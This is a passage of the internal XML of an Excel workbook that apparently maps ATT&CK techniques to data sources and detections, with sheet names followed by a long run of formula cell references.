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codeName="ThisWorkbook" defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/olafhartong/tools/ATTACKdatamap/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{02D9895A-D951-4243-8A37-9281E41D9EF9}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="640" yWindow="460" windowWidth="40320" windowHeight="25140" tabRatio="748" activeTab="4" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="RatingLegend" sheetId="3" r:id="rId1"/>
    <sheet name="DataSourceEvents" sheetId="1" r:id="rId2"/>
    <sheet name="Detection" sheetId="9" r:id="rId3"/>
    <sheet name="DefenseMitigation" sheetId="10" r:id="rId4"/>
    <sheet name="TechniqueDataSourceWeights" sheetId="2" r:id="rId5"/>
    <sheet name="TechniqueDataSourceWeights (2)" sheetId="15" r:id="rId6"/>
    <sheet name="DefenseBypassWeights" sheetId="11" r:id="rId7"/>
    <sheet name="TechniqueApplication" sheetId="14" r:id="rId8"/>
    <sheet name="Knowledge base" sheetId="7" r:id="rId9"/>
    <sheet name="REF-DataSources" sheetId="5" r:id="rId10"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">DefenseBypassWeights!$A$2:$G$224</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">TechniqueDataSourceWeights!$A$2:$G$224</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'TechniqueDataSourceWeights (2)'!$A$2:$G$224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D6" i="2" s="1"/>
  <c r="E6" i="2"/>
  <c r="G2" i="2"/>
  <c r="B7" i="2"/>
  <c r="D7" i="2" s="1"/>
  <c r="E7" i="2"/>
  <c r="B8" i="2"/>
  <c r="D8" i="2" s="1"/>
  <c r="E8" i="2"/>
  <c r="B9" i="2"/>
  <c r="D9" i="2" s="1"/>
  <c r="E9" i="2"/>
  <c r="B10" i="2"/>
  <c r="D10" i="2" s="1"/>
  <c r="E10" i="2"/>
  <c r="B11" i="2"/>
  <c r="D11" i="2" s="1"/>
  <c r="E11" i="2"/>
  <c r="B12" i="2"/>
  <c r="D12" i="2" s="1"/>
  <c r="E12" i="2"/>
  <c r="B13" i="2"/>
  <c r="D13" i="2" s="1"/>
  <c r="E13" i="2"/>
  <c r="B14" i="2"/>
  <c r="D14" i="2" s="1"/>
  <c r="E14" i="2"/>
  <c r="B15" i="2"/>
  <c r="D15" i="2" s="1"/>
  <c r="E15" i="2"/>
  <c r="B16" i="2"/>
  <c r="D16" i="2" s="1"/>
  <c r="E16" i="2"/>
  <c r="B17" i="2"/>
  <c r="D17" i="2" s="1"/>
  <c r="E17" i="2"/>
  <c r="E268" i="2" l="1"/>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B268" i="2"/>
  <c r="D268" i="2" s="1"/>
  <c r="B269" i="2"/>
  <c r="D269" i="2" s="1"/>
  <c r="B270" i="2"/>
  <c r="D270" i="2" s="1"/>
  <c r="B271" i="2"/>
  <c r="D271" i="2" s="1"/>
  <c r="B272" i="2"/>
  <c r="D272" i="2" s="1"/>
  <c r="B273" i="2"/>
  <c r="D273" i="2" s="1"/>
  <c r="B274" i="2"/>
  <c r="D274" i="2" s="1"/>
  <c r="B275" i="2"/>
  <c r="D275" i="2" s="1"/>
  <c r="B276" i="2"/>
  <c r="D276" i="2" s="1"/>
  <c r="B277" i="2"/>
  <c r="D277" i="2" s="1"/>
  <c r="B278" i="2"/>
  <c r="D278" i="2" s="1"/>
  <c r="B279" i="2"/>
  <c r="D279" i="2" s="1"/>
  <c r="B280" i="2"/>
  <c r="D280" i="2" s="1"/>
  <c r="B281" i="2"/>
  <c r="D281" i="2" s="1"/>
  <c r="B282" i="2"/>
  <c r="D282" i="2" s="1"/>
  <c r="B283" i="2"/>
  <c r="D283" i="2" s="1"/>
  <c r="B284" i="2"/>
  <c r="D284" i="2" s="1"/>
  <c r="B285" i="2"/>
  <c r="D285" i="2" s="1"/>
  <c r="B286" i="2"/>
  <c r="D286" i="2" s="1"/>
  <c r="B287" i="2"/>
  <c r="D287" i="2" s="1"/>
  <c r="B288" i="2"/>
  <c r="D288" i="2" s="1"/>
  <c r="B289" i="2"/>
  <c r="D289" i="2" s="1"/>
  <c r="B290" i="2"/>
  <c r="D290" i="2" s="1"/>
  <c r="B291" i="2"/>
  <c r="D291" i="2" s="1"/>
  <c r="B292" i="2"/>
  <c r="D292" i="2" s="1"/>
  <c r="B293" i="2"/>
  <c r="D293" i="2" s="1"/>
  <c r="B294" i="2"/>
  <c r="D294" i="2" s="1"/>
  <c r="B295" i="2"/>
  <c r="D295" i="2" s="1"/>
  <c r="B296" i="2"/>
  <c r="D296" i="2" s="1"/>
  <c r="B297" i="2"/>
  <c r="D297" i="2" s="1"/>
  <c r="B298" i="2"/>
  <c r="D298" i="2" s="1"/>
  <c r="B299" i="2"/>
  <c r="D299" i="2" s="1"/>
  <c r="B300" i="2"/>
  <c r="D300" i="2" s="1"/>
  <c r="B301" i="2"/>
  <c r="D301" i="2" s="1"/>
  <c r="B302" i="2"/>
  <c r="D302" i="2" s="1"/>
  <c r="B303" i="2"/>
  <c r="D303" i="2" s="1"/>
  <c r="B304" i="2"/>
  <c r="D304" i="2" s="1"/>
  <c r="B305" i="2"/>
  <c r="D305" i="2" s="1"/>
  <c r="B306" i="2"/>
  <c r="D306" i="2" s="1"/>
  <c r="B307" i="2"/>
  <c r="D307" i="2" s="1"/>
  <c r="B308" i="2"/>
  <c r="D308" i="2" s="1"/>
  <c r="B309" i="2"/>
  <c r="D309" i="2" s="1"/>
  <c r="B310" i="2"/>
  <c r="D310" i="2" s="1"/>
  <c r="B311" i="2"/>
  <c r="D311" i="2" s="1"/>
  <c r="B312" i="2"/>
  <c r="D312" i="2" s="1"/>
  <c r="B313" i="2"/>
  <c r="D313" i="2" s="1"/>
  <c r="B314" i="2"/>
  <c r="D314" i="2" s="1"/>
  <c r="B315" i="2"/>
  <c r="D315" i="2" s="1"/>
  <c r="B316" i="2"/>
  <c r="D316" i="2" s="1"/>
  <c r="B317" i="2"/>
  <c r="D317" i="2" s="1"/>
  <c r="B318" i="2"/>
  <c r="D318" i="2" s="1"/>
  <c r="B319" i="2"/>
  <c r="D319" i="2" s="1"/>
  <c r="B320" i="2"/>
  <c r="D320" i="2" s="1"/>
  <c r="B321" i="2"/>
  <c r="D321" i="2" s="1"/>
  <c r="B322" i="2"/>
  <c r="D322" i="2" s="1"/>
  <c r="B323" i="2"/>
  <c r="D323" i="2" s="1"/>
  <c r="B324" i="2"/>
  <c r="D324" i="2" s="1"/>
  <c r="B325" i="2"/>
  <c r="D325" i="2" s="1"/>
  <c r="B326" i="2"/>
  <c r="D326" i="2" s="1"/>
  <c r="B327" i="2"/>
  <c r="D327" i="2" s="1"/>
  <c r="B328" i="2"/>
  <c r="D328" i="2" s="1"/>
  <c r="B329" i="2"/>
  <c r="D329" i="2" s="1"/>
  <c r="B330" i="2"/>
  <c r="D330" i="2" s="1"/>
  <c r="B331" i="2"/>
  <c r="D331" i="2" s="1"/>
  <c r="B332" i="2"/>
  <c r="D332" i="2" s="1"/>
  <c r="B333" i="2"/>
  <c r="D333" i="2" s="1"/>
  <c r="B334" i="2"/>
  <c r="D334" i="2" s="1"/>
  <c r="B335" i="2"/>
  <c r="D335" i="2" s="1"/>
  <c r="B336" i="2"/>
  <c r="D336" i="2" s="1"/>
  <c r="B337" i="2"/>
  <c r="D337" i="2" s="1"/>
  <c r="B338" i="2"/>
  <c r="D338" i="2" s="1"/>
  <c r="B339" i="2"/>
  <c r="D339" i="2" s="1"/>
  <c r="B340" i="2"/>
  <c r="D340" i="2" s="1"/>
  <c r="B341" i="2"/>
  <c r="D341" i="2" s="1"/>
  <c r="B342" i="2"/>
  <c r="D342" i="2" s="1"/>
  <c r="B343" i="2"/>
  <c r="D343" i="2" s="1"/>
  <c r="B344" i="2"/>
  <c r="D344" i="2" s="1"/>
  <c r="B345" i="2"/>
  <c r="D345" i="2" s="1"/>
  <c r="B346" i="2"/>
  <c r="D346" i="2" s="1"/>
  <c r="B347" i="2"/>
  <c r="D347" i="2" s="1"/>
  <c r="B348" i="2"/>
  <c r="D348" i="2" s="1"/>
  <c r="B349" i="2"/>
  <c r="D349" i="2" s="1"/>
  <c r="B350" i="2"/>
  <c r="D350" i="2" s="1"/>
  <c r="B351" i="2"/>
  <c r="D351" i="2" s="1"/>
  <c r="B352" i="2"/>
  <c r="D352" i="2" s="1"/>
  <c r="B353" i="2"/>
  <c r="D353" i="2" s="1"/>
  <c r="B354" i="2"/>
  <c r="D354" i="2" s="1"/>
  <c r="B355" i="2"/>
  <c r="D355" i="2" s="1"/>
  <c r="B356" i="2"/>
  <c r="D356" i="2" s="1"/>
  <c r="B357" i="2"/>
  <c r="D357" i="2" s="1"/>
  <c r="B358" i="2"/>
  <c r="D358" i="2" s="1"/>
  <c r="B359" i="2"/>
  <c r="D359" i="2" s="1"/>
  <c r="B360" i="2"/>
  <c r="D360" i="2" s="1"/>
  <c r="B361" i="2"/>
  <c r="D361" i="2" s="1"/>
  <c r="B362" i="2"/>
  <c r="D362" i="2" s="1"/>
  <c r="B363" i="2"/>
  <c r="D363" i="2" s="1"/>
  <c r="B364" i="2"/>
  <c r="D364" i="2" s="1"/>
  <c r="B365" i="2"/>
  <c r="D365" i="2" s="1"/>
  <c r="B366" i="2"/>
  <c r="D366" i="2" s="1"/>
  <c r="B367" i="2"/>
  <c r="D367" i="2" s="1"/>
  <c r="B368" i="2"/>
  <c r="D368" i="2" s="1"/>
  <c r="B369" i="2"/>
  <c r="D369" i="2" s="1"/>
  <c r="B370" i="2"/>
  <c r="D370" i="2" s="1"/>
  <c r="B371" i="2"/>
  <c r="D371" i="2" s="1"/>
  <c r="B372" i="2"/>
  <c r="D372" i="2" s="1"/>
  <c r="B373" i="2"/>
  <c r="D373" i="2" s="1"/>
  <c r="B374" i="2"/>
  <c r="D374" i="2" s="1"/>
  <c r="B375" i="2"/>
  <c r="D375" i="2" s="1"/>
  <c r="B376" i="2"/>
  <c r="D376" i="2" s="1"/>
  <c r="B377" i="2"/>
  <c r="D377" i="2" s="1"/>
  <c r="B378" i="2"/>
  <c r="D378" i="2" s="1"/>
  <c r="B379" i="2"/>
  <c r="D379" i="2" s="1"/>
  <c r="B380" i="2"/>
  <c r="D380" i="2" s="1"/>
  <c r="B381" i="2"/>
  <c r="D381" i="2" s="1"/>
  <c r="B382" i="2"/>
  <c r="D382" i="2" s="1"/>
  <c r="B383" i="2"/>
  <c r="D383" i="2" s="1"/>
  <c r="B384" i="2"/>
  <c r="D384" i="2" s="1"/>
  <c r="B385" i="2"/>
  <c r="D385" i="2" s="1"/>
  <c r="B386" i="2"/>
  <c r="D386" i="2" s="1"/>
  <c r="B387" i="2"/>
  <c r="D387" i="2" s="1"/>
  <c r="B388" i="2"/>
  <c r="D388" i="2" s="1"/>
  <c r="B389" i="2"/>
  <c r="D389" i="2" s="1"/>
  <c r="B390" i="2"/>
  <c r="D390" i="2" s="1"/>
  <c r="B391" i="2"/>
  <c r="D391" i="2" s="1"/>
  <c r="B392" i="2"/>
  <c r="D392" i="2" s="1"/>
  <c r="B393" i="2"/>
  <c r="D393" i="2" s="1"/>
  <c r="B394" i="2"/>
  <c r="D394" i="2" s="1"/>
  <c r="B395" i="2"/>
  <c r="D395" i="2" s="1"/>
  <c r="B396" i="2"/>
  <c r="D396" i="2" s="1"/>
  <c r="B397" i="2"/>
  <c r="D397" i="2" s="1"/>
  <c r="B398" i="2"/>
  <c r="D398" i="2" s="1"/>
  <c r="B399" i="2"/>
  <c r="D399" i="2" s="1"/>
  <c r="B400" i="2"/>
  <c r="D400" i="2" s="1"/>
  <c r="B401" i="2"/>
  <c r="D401" i="2" s="1"/>
  <c r="B402" i="2"/>
  <c r="D402" i="2" s="1"/>
  <c r="B403" i="2"/>
  <c r="D403" i="2" s="1"/>
  <c r="B404" i="2"/>
  <c r="D404" i="2" s="1"/>
  <c r="B405" i="2"/>
  <c r="D405" i="2" s="1"/>
  <c r="B406" i="2"/>
  <c r="D406" i="2" s="1"/>
  <c r="B407" i="2"/>
  <c r="D407" i="2" s="1"/>
  <c r="B408" i="2"/>
  <c r="D408" i="2" s="1"/>
  <c r="B409" i="2"/>
  <c r="D409" i="2" s="1"/>
  <c r="B410" i="2"/>
  <c r="D410" i="2" s="1"/>
  <c r="B411" i="2"/>
  <c r="D411" i="2" s="1"/>
  <c r="B412" i="2"/>
  <c r="D412" i="2" s="1"/>
  <c r="B413" i="2"/>
  <c r="D413" i="2" s="1"/>
  <c r="B414" i="2"/>
  <c r="D414" i="2" s="1"/>
  <c r="B415" i="2"/>
  <c r="D415" i="2" s="1"/>
  <c r="B416" i="2"/>
  <c r="D416" i="2" s="1"/>
  <c r="B417" i="2"/>
  <c r="D417" i="2" s="1"/>
  <c r="B418" i="2"/>
  <c r="D418" i="2" s="1"/>
  <c r="B419" i="2"/>
  <c r="D419" i="2" s="1"/>
  <c r="B420" i="2"/>
  <c r="D420" i="2" s="1"/>
  <c r="B421" i="2"/>
  <c r="D421" i="2" s="1"/>
  <c r="B422" i="2"/>
  <c r="D422" i="2" s="1"/>
  <c r="B423" i="2"/>
  <c r="D423" i="2" s="1"/>
  <c r="B424" i="2"/>
  <c r="D424" i="2" s="1"/>
  <c r="B425" i="2"/>
  <c r="D425" i="2" s="1"/>
  <c r="B426" i="2"/>
  <c r="D426" i="2" s="1"/>
  <c r="B427" i="2"/>
  <c r="D427" i="2" s="1"/>
  <c r="B428" i="2"/>
  <c r="D428" i="2" s="1"/>
  <c r="B429" i="2"/>
  <c r="D429" i="2" s="1"/>
  <c r="B430" i="2"/>
  <c r="D430" i="2" s="1"/>
  <c r="B431" i="2"/>
  <c r="D431" i="2" s="1"/>
  <c r="B432" i="2"/>
  <c r="D432" i="2" s="1"/>
  <c r="B433" i="2"/>
  <c r="D433" i="2" s="1"/>
  <c r="B434" i="2"/>
  <c r="D434" i="2" s="1"/>
  <c r="B435" i="2"/>
  <c r="D435" i="2" s="1"/>
  <c r="B436" i="2"/>
  <c r="D436" i="2" s="1"/>
  <c r="B437" i="2"/>
  <c r="D437" i="2" s="1"/>
  <c r="B438" i="2"/>
  <c r="D438" i="2" s="1"/>
  <c r="B439" i="2"/>
  <c r="D439" i="2" s="1"/>
  <c r="B440" i="2"/>
  <c r="D440" i="2" s="1"/>
  <c r="B441" i="2"/>
  <c r="D441" i="2" s="1"/>
  <c r="B442" i="2"/>
  <c r="D442" i="2" s="1"/>
  <c r="B443" i="2"/>
  <c r="D443" i="2" s="1"/>
  <c r="B444" i="2"/>
  <c r="D444" i="2" s="1"/>
  <c r="B445" i="2"/>
  <c r="D445" i="2" s="1"/>
  <c r="B446" i="2"/>
  <c r="D446" i="2" s="1"/>
  <c r="B447" i="2"/>
  <c r="D447" i="2" s="1"/>
  <c r="B448" i="2"/>
  <c r="D448" i="2" s="1"/>
  <c r="B449" i="2"/>
  <c r="D449" i="2" s="1"/>
  <c r="B450" i="2"/>
  <c r="D450" i="2" s="1"/>
  <c r="B451" i="2"/>
  <c r="D451" i="2" s="1"/>
  <c r="B452" i="2"/>
  <c r="D452" i="2" s="1"/>
  <c r="B453" i="2"/>
  <c r="D453" i="2" s="1"/>
  <c r="B454" i="2"/>
  <c r="D454" i="2" s="1"/>
  <c r="B455" i="2"/>
  <c r="D455" i="2" s="1"/>
  <c r="B456" i="2"/>
  <c r="D456" i="2" s="1"/>
  <c r="B457" i="2"/>
  <c r="D457" i="2" s="1"/>
  <c r="B458" i="2"/>
  <c r="D458" i="2" s="1"/>
  <c r="B459" i="2"/>
  <c r="D459" i="2" s="1"/>
  <c r="B460" i="2"/>
  <c r="D460" i="2" s="1"/>
  <c r="B461" i="2"/>
  <c r="D461" i="2" s="1"/>
  <c r="B462" i="2"/>
  <c r="D462" i="2" s="1"/>
  <c r="B463" i="2"/>
  <c r="D463" i="2" s="1"/>
  <c r="B464" i="2"/>
  <c r="D464" i="2" s="1"/>
  <c r="B465" i="2"/>
  <c r="D465" i="2" s="1"/>
  <c r="B466" i="2"/>
  <c r="D466" i="2" s="1"/>
  <c r="B467" i="2"/>
  <c r="D467" i="2" s="1"/>
  <c r="B468" i="2"/>
  <c r="D468" i="2" s="1"/>
  <c r="B469" i="2"/>
  <c r="D469" i="2" s="1"/>
  <c r="B470" i="2"/>
  <c r="D470" i="2" s="1"/>
  <c r="B471" i="2"/>
  <c r="D471" i="2" s="1"/>
  <c r="B472" i="2"/>
  <c r="D472" i="2" s="1"/>
  <c r="B473" i="2"/>
  <c r="D473" i="2" s="1"/>
  <c r="B474" i="2"/>
  <c r="D474" i="2" s="1"/>
  <c r="B475" i="2"/>
  <c r="D475" i="2" s="1"/>
  <c r="B476" i="2"/>
  <c r="D476" i="2" s="1"/>
  <c r="B477" i="2"/>
  <c r="D477" i="2" s="1"/>
  <c r="B478" i="2"/>
  <c r="D478" i="2" s="1"/>
  <c r="B479" i="2"/>
  <c r="D479" i="2" s="1"/>
  <c r="B480" i="2"/>
  <c r="D480" i="2" s="1"/>
  <c r="B481" i="2"/>
  <c r="D481" i="2" s="1"/>
  <c r="B482" i="2"/>
  <c r="D482" i="2" s="1"/>
  <c r="B483" i="2"/>
  <c r="D483" i="2" s="1"/>
  <c r="B484" i="2"/>
  <c r="D484" i="2" s="1"/>
  <c r="B485" i="2"/>
  <c r="D485" i="2" s="1"/>
  <c r="B486" i="2"/>
  <c r="D486" i="2" s="1"/>
  <c r="B487" i="2"/>
  <c r="D487" i="2" s="1"/>
  <c r="B488" i="2"/>
  <c r="D488" i="2" s="1"/>
  <c r="B489" i="2"/>
  <c r="D489" i="2" s="1"/>
  <c r="B490" i="2"/>
  <c r="D490" i="2" s="1"/>
  <c r="B491" i="2"/>
  <c r="D491" i="2" s="1"/>
  <c r="B492" i="2"/>
  <c r="D492" i="2" s="1"/>
  <c r="B493" i="2"/>
  <c r="D493" i="2" s="1"/>
  <c r="B494" i="2"/>
  <c r="D494" i="2" s="1"/>
  <c r="B495" i="2"/>
  <c r="D495" i="2" s="1"/>
  <c r="B496" i="2"/>
  <c r="D496" i="2" s="1"/>
  <c r="B497" i="2"/>
  <c r="D497" i="2" s="1"/>
  <c r="B498" i="2"/>
  <c r="D498" i="2" s="1"/>
  <c r="B499" i="2"/>
  <c r="D499" i="2" s="1"/>
  <c r="B500" i="2"/>
  <c r="D500" i="2" s="1"/>
  <c r="B501" i="2"/>
  <c r="D501" i="2" s="1"/>
  <c r="B502" i="2"/>
  <c r="D502" i="2" s="1"/>
  <c r="B503" i="2"/>
  <c r="D503" i="2" s="1"/>
  <c r="B504" i="2"/>
  <c r="D504" i="2" s="1"/>
  <c r="B505" i="2"/>
  <c r="D505" i="2" s="1"/>
  <c r="B506" i="2"/>
  <c r="D506" i="2" s="1"/>
  <c r="B507" i="2"/>
  <c r="D507" i="2" s="1"/>
  <c r="B508" i="2"/>
  <c r="D508" i="2" s="1"/>
  <c r="B509" i="2"/>
  <c r="D509" i="2" s="1"/>
  <c r="B510" i="2"/>
  <c r="D510" i="2" s="1"/>
  <c r="B511" i="2"/>
  <c r="D511" i="2" s="1"/>
  <c r="B512" i="2"/>
  <c r="D512" i="2" s="1"/>
  <c r="B513" i="2"/>
  <c r="D513" i="2" s="1"/>
  <c r="B514" i="2"/>
  <c r="D514" i="2" s="1"/>
  <c r="B515" i="2"/>
  <c r="D515" i="2" s="1"/>
  <c r="B516" i="2"/>
  <c r="D516" i="2" s="1"/>
  <c r="B517" i="2"/>
  <c r="D517" i="2" s="1"/>
  <c r="B518" i="2"/>
  <c r="D518" i="2" s="1"/>
  <c r="B519" i="2"/>
  <c r="D519" i="2" s="1"/>
  <c r="B520" i="2"/>
  <c r="D520" i="2" s="1"/>
  <c r="B521" i="2"/>
  <c r="D521" i="2" s="1"/>
  <c r="B522" i="2"/>
  <c r="D522" i="2" s="1"/>
  <c r="B523" i="2"/>
  <c r="D523" i="2" s="1"/>
  <c r="B524" i="2"/>
  <c r="D524" i="2" s="1"/>
  <c r="B525" i="2"/>
  <c r="D525" i="2" s="1"/>
  <c r="B526" i="2"/>
  <c r="D526" i="2" s="1"/>
  <c r="B527" i="2"/>
  <c r="D527" i="2" s="1"/>
  <c r="B528" i="2"/>
  <c r="D528" i="2" s="1"/>
  <c r="B529" i="2"/>
  <c r="D529" i="2" s="1"/>
  <c r="B530" i="2"/>
  <c r="D530" i="2" s="1"/>
  <c r="B531" i="2"/>
  <c r="D531" i="2" s="1"/>
  <c r="B532" i="2"/>
  <c r="D532" i="2" s="1"/>
  <c r="B533" i="2"/>
  <c r="D533" i="2" s="1"/>
  <c r="B534" i="2"/>
  <c r="D534" i="2" s="1"/>
  <c r="B535" i="2"/>
  <c r="D535" i="2" s="1"/>
  <c r="B536" i="2"/>
  <c r="D536" i="2" s="1"/>
  <c r="B537" i="2"/>
  <c r="D537" i="2" s="1"/>
  <c r="B538" i="2"/>
  <c r="D538" i="2" s="1"/>
  <c r="B539" i="2"/>
  <c r="D539" i="2" s="1"/>
  <c r="B540" i="2"/>
  <c r="D540" i="2" s="1"/>
  <c r="B541" i="2"/>
  <c r="D541" i="2" s="1"/>
  <c r="B542" i="2"/>
  <c r="D542" i="2" s="1"/>
  <c r="B543" i="2"/>
  <c r="D543" i="2" s="1"/>
  <c r="B544" i="2"/>
  <c r="D544" i="2" s="1"/>
  <c r="B545" i="2"/>
  <c r="D545" i="2" s="1"/>
  <c r="B546" i="2"/>
  <c r="D546" i="2" s="1"/>
  <c r="B547" i="2"/>
  <c r="D547" i="2" s="1"/>
  <c r="B548" i="2"/>
  <c r="D548" i="2" s="1"/>
  <c r="B549" i="2"/>
  <c r="D549" i="2" s="1"/>
  <c r="B550" i="2"/>
  <c r="D550" i="2" s="1"/>
  <c r="B551" i="2"/>
  <c r="D551" i="2" s="1"/>
  <c r="B552" i="2"/>
  <c r="D552" i="2" s="1"/>
  <c r="B553" i="2"/>
  <c r="D553" i="2" s="1"/>
  <c r="B554" i="2"/>
  <c r="D554" i="2" s="1"/>
  <c r="B555" i="2"/>
  <c r="D555" i="2" s="1"/>
  <c r="B556" i="2"/>
  <c r="D556" i="2" s="1"/>
  <c r="B557" i="2"/>
  <c r="D557" i="2" s="1"/>
  <c r="B558" i="2"/>
  <c r="D558" i="2" s="1"/>
  <c r="B559" i="2"/>
  <c r="D559" i="2" s="1"/>
  <c r="B560" i="2"/>
  <c r="D560" i="2" s="1"/>
  <c r="B561" i="2"/>
  <c r="D561" i="2" s="1"/>
  <c r="B562" i="2"/>
  <c r="D562" i="2" s="1"/>
  <c r="B563" i="2"/>
  <c r="D563" i="2" s="1"/>
  <c r="B564" i="2"/>
  <c r="D564" i="2" s="1"/>
  <c r="B565" i="2"/>
  <c r="D565" i="2" s="1"/>
  <c r="B566" i="2"/>
  <c r="D566" i="2" s="1"/>
  <c r="B567" i="2"/>
  <c r="D567" i="2" s="1"/>
  <c r="B568" i="2"/>
  <c r="D568" i="2" s="1"/>
  <c r="B569" i="2"/>
  <c r="D569" i="2" s="1"/>
  <c r="E267" i="15"/>
  <c r="B267" i="15"/>
  <c r="D267" i="15" s="1"/>
  <c r="E266" i="15"/>
  <c r="B266" i="15"/>
  <c r="D266" i="15" s="1"/>
  <c r="E265" i="15"/>
  <c r="B265" i="15"/>
  <c r="D265" i="15" s="1"/>
  <c r="E264" i="15"/>
  <c r="B264" i="15"/>
  <c r="D264" i="15" s="1"/>
  <c r="E263" i="15"/>
  <c r="B263" i="15"/>
  <c r="D263" i="15" s="1"/>
  <c r="E262" i="15"/>
  <c r="B262" i="15"/>
  <c r="D262" i="15" s="1"/>
  <c r="E261" i="15"/>
  <c r="B261" i="15"/>
  <c r="D261" i="15" s="1"/>
  <c r="E260" i="15"/>
  <c r="B260" i="15"/>
  <c r="D260" i="15" s="1"/>
  <c r="E259" i="15"/>
  <c r="B259" i="15"/>
  <c r="D259" i="15" s="1"/>
  <c r="E258" i="15"/>
  <c r="B258" i="15"/>
  <c r="D258" i="15" s="1"/>
  <c r="E257" i="15"/>
  <c r="B257" i="15"/>
  <c r="D257" i="15" s="1"/>
  <c r="E256" i="15"/>
  <c r="B256" i="15"/>
  <c r="D256" i="15" s="1"/>
  <c r="E255" i="15"/>
  <c r="B255" i="15"/>
  <c r="D255" i="15" s="1"/>
  <c r="E254" i="15"/>
  <c r="B254" i="15"/>
  <c r="D254" i="15" s="1"/>
  <c r="E253" i="15"/>
  <c r="B253" i="15"/>
  <c r="D253" i="15" s="1"/>
  <c r="E252" i="15"/>
  <c r="B252" i="15"/>
  <c r="D252" i="15" s="1"/>
  <c r="E251" i="15"/>
  <c r="B251" i="15"/>
  <c r="D251" i="15" s="1"/>
  <c r="E250" i="15"/>
  <c r="B250" i="15"/>
  <c r="D250" i="15" s="1"/>
  <c r="E249" i="15"/>
  <c r="B249" i="15"/>
  <c r="D249" i="15" s="1"/>
  <c r="E248" i="15"/>
  <c r="B248" i="15"/>
  <c r="D248" i="15" s="1"/>
  <c r="E247" i="15"/>
  <c r="B247" i="15"/>
  <c r="D247" i="15" s="1"/>
  <c r="E246" i="15"/>
  <c r="B246" i="15"/>
  <c r="D246" i="15" s="1"/>
  <c r="E245" i="15"/>
  <c r="B245" i="15"/>
  <c r="D245" i="15" s="1"/>
  <c r="E244" i="15"/>
  <c r="B244" i="15"/>
  <c r="D244" i="15" s="1"/>
  <c r="E243" i="15"/>
  <c r="B243" i="15"/>
  <c r="D243" i="15" s="1"/>
  <c r="E242" i="15"/>
  <c r="B242" i="15"/>
  <c r="D242" i="15" s="1"/>
  <c r="E241" i="15"/>
  <c r="B241" i="15"/>
  <c r="D241" i="15" s="1"/>
  <c r="E240" i="15"/>
  <c r="B240" i="15"/>
  <c r="D240" i="15" s="1"/>
  <c r="E239" i="15"/>
  <c r="B239" i="15"/>
  <c r="D239" i="15" s="1"/>
  <c r="E238" i="15"/>
  <c r="B238" i="15"/>
  <c r="D238" i="15" s="1"/>
  <c r="E237" i="15"/>
  <c r="B237" i="15"/>
  <c r="D237" i="15" s="1"/>
  <c r="E236" i="15"/>
  <c r="B236" i="15"/>
  <c r="D236" i="15" s="1"/>
  <c r="E235" i="15"/>
  <c r="B235" i="15"/>
  <c r="D235" i="15" s="1"/>
  <c r="E234" i="15"/>
  <c r="B234" i="15"/>
  <c r="D234" i="15" s="1"/>
  <c r="E233" i="15"/>
  <c r="B233" i="15"/>
  <c r="D233" i="15" s="1"/>
  <c r="E232" i="15"/>
  <c r="B232" i="15"/>
  <c r="D232" i="15" s="1"/>
  <c r="E231" i="15"/>
  <c r="B231" i="15"/>
  <c r="D231" i="15" s="1"/>
  <c r="E230" i="15"/>
  <c r="B230" i="15"/>
  <c r="D230" i="15" s="1"/>
  <c r="E229" i="15"/>
  <c r="B229" i="15"/>
  <c r="D229" i="15" s="1"/>
  <c r="E228" i="15"/>
  <c r="B228" i="15"/>
  <c r="D228" i="15" s="1"/>
  <c r="E227" i="15"/>
  <c r="B227" i="15"/>
  <c r="D227" i="15" s="1"/>
  <c r="E226" i="15"/>
  <c r="B226" i="15"/>
  <c r="D226" i="15" s="1"/>
  <c r="E225" i="15"/>
  <c r="B225" i="15"/>
  <c r="D225" i="15" s="1"/>
  <c r="E224" i="15"/>
  <c r="B224" i="15"/>
  <c r="D224" i="15" s="1"/>
  <c r="E223" i="15"/>
  <c r="B223" i="15"/>
  <c r="D223" i="15" s="1"/>
  <c r="E222" i="15"/>
  <c r="B222" i="15"/>
  <c r="D222" i="15" s="1"/>
  <c r="E221" i="15"/>
  <c r="B221" i="15"/>
  <c r="D221" i="15" s="1"/>
  <c r="E220" i="15"/>
  <c r="B220" i="15"/>
  <c r="D220" i="15" s="1"/>
  <c r="E219" i="15"/>
  <c r="B219" i="15"/>
  <c r="D219" i="15" s="1"/>
  <c r="E218" i="15"/>
  <c r="B218" i="15"/>
  <c r="D218" i="15" s="1"/>
  <c r="E217" i="15"/>
  <c r="B217" i="15"/>
  <c r="D217" i="15" s="1"/>
  <c r="E216" i="15"/>
  <c r="B216" i="15"/>
  <c r="D216" i="15" s="1"/>
  <c r="E215" i="15"/>
  <c r="B215" i="15"/>
  <c r="D215" i="15" s="1"/>
  <c r="E214" i="15"/>
  <c r="B214" i="15"/>
  <c r="D214" i="15" s="1"/>
  <c r="E213" i="15"/>
  <c r="B213" i="15"/>
  <c r="D213" i="15" s="1"/>
  <c r="E212" i="15"/>
  <c r="B212" i="15"/>
  <c r="D212" i="15" s="1"/>
  <c r="E211" i="15"/>
  <c r="B211" i="15"/>
  <c r="D211" i="15" s="1"/>
  <c r="E210" i="15"/>
  <c r="B210" i="15"/>
  <c r="D210" i="15" s="1"/>
  <c r="E209" i="15"/>
  <c r="B209" i="15"/>
  <c r="D209" i="15" s="1"/>
  <c r="E208" i="15"/>
  <c r="B208" i="15"/>
  <c r="D208" i="15" s="1"/>
  <c r="E207" i="15"/>
  <c r="B207" i="15"/>
  <c r="D207" i="15" s="1"/>
  <c r="E206" i="15"/>
  <c r="B206" i="15"/>
  <c r="D206" i="15" s="1"/>
  <c r="E205" i="15"/>
  <c r="B205" i="15"/>
  <c r="D205" i="15" s="1"/>
  <c r="E204" i="15"/>
  <c r="B204" i="15"/>
  <c r="D204" i="15" s="1"/>
  <c r="E203" i="15"/>
